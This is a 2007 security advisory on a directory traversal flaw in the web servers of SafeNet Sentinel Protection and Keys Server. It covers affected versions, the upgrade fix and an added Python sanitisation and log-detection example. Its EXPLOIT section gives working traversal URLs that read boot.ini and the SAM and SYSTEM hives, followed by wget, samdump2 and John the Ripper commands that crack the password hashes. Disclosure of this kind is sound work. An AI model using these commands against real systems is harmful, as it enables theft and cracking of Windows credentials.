
SafeNet Sentinel Protection Server and Keys Server directory traversal



Directory Traversal in SafeNet Sentinel Protection Server and Keys Server

SUMMARY
======
SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
================
* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
=========
* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
=====
A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes.

DETAILS
======
Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not sanitize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.
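As an added illustration of the missing check described above (example code written for this page, not SafeNet's software), the following resolves a request path against a document root so that '..' can never escape it, and then runs the same normalisation over constructed access-log lines as a detection rule. The document root and the log format are assumptions.

```python
from urllib.parse import unquote
import posixpath

# Assumed document root for the example; the advisory does not name the real one.
DOC_ROOT = "/srv/sentinel/www"


def resolve_request_path(request_path, doc_root=DOC_ROOT):
    """Map an HTTP request path onto a file under doc_root, or return None.

    This is the step the advisory says the affected servers skipped: the path
    is percent-decoded once, backslashes count as separators (the servers run
    on Windows), and '..' is resolved on a segment stack so the result can
    never climb above the document root.
    """
    path = unquote(request_path)
    if "\x00" in path or ":" in path:     # NUL truncation and drive letters
        return None
    stack = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:                  # would leave the root: reject
                return None
            stack.pop()
        else:
            stack.append(seg)
    return posixpath.join(doc_root, *stack) if stack else doc_root


# Constructed sample access-log lines: "<client> <listening port> <request path>".
SAMPLE_LOG = [
    "10.0.0.5 6002 /index.html",
    "10.0.0.9 6002 /../../../../../../boot.ini",
    "10.0.0.9 7002 /%2e%2e/%2e%2e/winnt/repair/sam",
    "10.0.0.7 6002 /status/../index.html",
]


def flag_traversal(lines):
    """Return (client, port, path) for each logged request the sanitizer rejects.

    Encoded and backslash variants are caught; '/status/../index.html' stays
    inside the root and is not flagged, which keeps false positives down.
    """
    hits = []
    for line in lines:
        client, port, path = line.split(" ", 2)
        if resolve_request_path(path) is None:
            hits.append((client, port, path))
    return hits
```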

SOLUTION
=======
Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip 

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip 

EXPLOIT
======
Most popular web browsers are not able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini 

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam 

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam 
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system 
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php 
http://www.openwall.com/john/ 

ACKNOWLEDGMENTS
==============
Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
===============
2007-11-26  original release

-- 
Elliot Kendall  
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/ 
